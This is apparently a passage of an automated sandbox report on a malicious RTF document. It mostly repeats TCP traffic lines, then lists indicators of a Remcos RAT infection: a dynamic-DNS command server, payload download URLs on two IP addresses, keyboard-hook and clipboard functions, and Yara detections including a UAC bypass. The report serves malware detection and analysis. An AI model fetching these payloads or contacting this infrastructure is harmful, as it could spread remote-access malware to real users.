                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163

                Networking

                barindex
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: tochisglobal.ddns.net
                Uses dynamic DNS services
                Source: unknownDNS query: name: tochisglobal.ddns.net
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 103.253.17.222:6426
                Source: weseethesimplethingsalwaystog.vBS.2.drBinary string: http://schemas.microsoft.com/wbem/wsman/1/config/service><transport>transport</transport><force/></analyze_input> - obfuscation quality: 4
                Source: weseethesimplethingsalwaystog.vBS.2.drBinary string: http://schemas.microsoft.com/wbem/wsman/1/config/service><transport>transport</transport></analyze_input> - obfuscation quality: 4
                Source: weseethesimplethingsalwaystoget[1].gif.2.drBinary string: http://schemas.microsoft.com/wbem/wsman/1/config/service><transport>transport</transport><force/></analyze_input> - obfuscation quality: 4
                Source: weseethesimplethingsalwaystoget[1].gif.2.drBinary string: http://schemas.microsoft.com/wbem/wsman/1/config/service><transport>transport</transport></analyze_input> - obfuscation quality: 4
                Source: global trafficHTTP traffic detected: GET /Upload/vbs.jpeg HTTP/1.1Host: 198.46.176.133Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /47/BEN.txt HTTP/1.1Host: 172.245.123.11Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                Source: Joe Sandbox ViewIP Address: 198.46.176.133 198.46.176.133
                Source: Joe Sandbox ViewIP Address: 103.253.17.222 103.253.17.222
                Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
                Source: Joe Sandbox ViewASN Name: WIFIKU-AS-IDPTWifikuIndonesiaID WIFIKU-AS-IDPTWifikuIndonesiaID
                Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
                Source: global trafficHTTP traffic detected: GET /47/weseethesimplethingsalwaystoget.gIF HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 172.245.123.11Connection: Keep-Alive
                Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
                Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
                Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
                Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
                Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
                Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
                Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
                Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
                Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
                Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
                Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
                Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
                Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
                Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
                Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
                Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
                Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
                Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
                Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
                Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
                Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
                Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
                Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
                Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
                Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
                Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
                Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
                Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
                Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
                Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
                Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
                Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
                Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
                Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
                Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
                Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
                Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
                Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
                Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
                Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
                Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
                Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
                Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
                Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
                Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
                Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
                Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
                Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
                Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
                Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0041B380 InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,8_2_0041B380
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{5878D53A-917D-4F0D-8E7A-DADC951BC237}.tmpJump to behavior
                Source: global trafficHTTP traffic detected: GET /47/weseethesimplethingsalwaystoget.gIF HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 172.245.123.11Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /Upload/vbs.jpeg HTTP/1.1Host: 198.46.176.133Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /47/BEN.txt HTTP/1.1Host: 172.245.123.11Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                Source: global trafficDNS traffic detected: DNS query: tochisglobal.ddns.net
                Source: global trafficDNS traffic detected: DNS query: geoplugin.net
                Source: powershell.exe, 00000006.00000002.377227143.0000000009331000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.245.123.11
                Source: powershell.exe, 00000006.00000002.377227143.0000000009331000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.245.123.11/47/BEN.txt
                Source: EQNEDT32.EXE, 00000002.00000002.357699051.00000000008DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.245.123.11/47/weseethesimplethingsalwaystoget.gIF
                Source: EQNEDT32.EXE, 00000002.00000002.357699051.00000000008DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.245.123.11/47/weseethesimplethingsalwaystoget.gIFj
                Source: powershell.exe, 00000006.00000002.373509848.00000000026BB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.46.176.133
                Source: powershell.exe, 00000006.00000002.373509848.00000000026BB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.46.176.133/Upload/vbs.jpeg
                Source: RegAsm.exe, RegAsm.exe, 00000008.00000002.879647352.00000000008B5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.879647352.0000000000871000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
                Source: powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.0000000003B20000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
                Source: RegAsm.exe, 00000008.00000002.879647352.00000000008B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp9k
                Source: powershell.exe, 00000006.00000002.374984057.0000000005101000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.micro
                Source: powershell.exe, 00000006.00000002.374984057.0000000005101000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.micros=
                Source: powershell.exe, 00000006.00000002.374984057.0000000005101000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.microsofy
                Source: powershell.exe, 00000006.00000002.373610773.00000000035A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                Source: powershell.exe, 00000006.00000002.373509848.0000000002581000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: powershell.exe, 00000006.00000002.373610773.00000000035A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                Source: powershell.exe, 00000006.00000002.373610773.00000000035A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                Source: powershell.exe, 00000006.00000002.373610773.00000000035A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                Source: powershell.exe, 00000006.00000002.373610773.00000000035A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                barindex
                Contains functionality to register a low level keyboard hook
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0040A2B8 SetWindowsHookExA 0000000D,0040A2A4,000000008_2_0040A2B8
                Installs a global keyboard hook
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0040B70E OpenClipboard,GetClipboardData,CloseClipboard,8_2_0040B70E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_004168C1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,8_2_004168C1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0040B70E OpenClipboard,GetClipboardData,CloseClipboard,8_2_0040B70E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0040A3E0 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,8_2_0040A3E0

                E-Banking Fraud

                barindex
                Yara detected Remcos RAT
                Source: Yara matchFile source: 8.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.powershell.exe.3f87e48.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.powershell.exe.36e9a80.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.powershell.exe.3f87e48.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000008.00000002.879647352.00000000008B5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.879647352.00000000008B2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.879647352.0000000000871000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.879945414.0000000000DFE000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.879647352.0000000000855000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.373610773.0000000003B20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3076, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3228, type: MEMORYSTR
                Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: 4vzwJTZbwT.rtf, type: SAMPLEMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
                Source: 8.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 8.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 8.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
